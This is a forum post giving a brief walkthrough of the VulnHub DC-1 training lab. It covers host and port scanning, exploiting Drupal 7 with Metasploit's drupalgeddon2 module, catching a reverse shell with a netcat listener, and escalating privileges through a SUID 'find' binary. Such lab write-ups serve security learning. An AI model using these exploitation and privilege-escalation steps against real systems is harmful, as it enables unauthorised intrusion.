vulnhub DC-1靶场

打印 上一主题 下一主题

主题 894|帖子 894|积分 2682

1.扫描主机

sudo arp-scan -l

扫描端口
nmap -p- 192.168.42.147

扫描主机指纹,发现Drupal 7 cms

2.得到shell(2.1,2.2)只用一种即可

2.1开始msf漏洞利用

mfconsole

search drupal
search 7600
use exploit/unix/webapp/drupal_drupalgeddon2

set rhosts 192.168.42.147
run

2.2脚本exp得到反弹shell

找到脚本,修改脚本,执行脚本



nc 监听 8888 端口 得到反弹shell
python -c "import pty;pty.spawn('/bin/bash')"  美化一下

3.metepreter> 看到这个,说明成功拿下shell

shell
python -c "import pty;pty.spawn('/bin/bash')"  美化一下

4.开始提权

find / -perm -u=s -type f 2>/dev/null

发现/usr/bin/find,利用提权
find . -exec /bin/sh \;

成功提权,寻找flag


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

石小疯

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表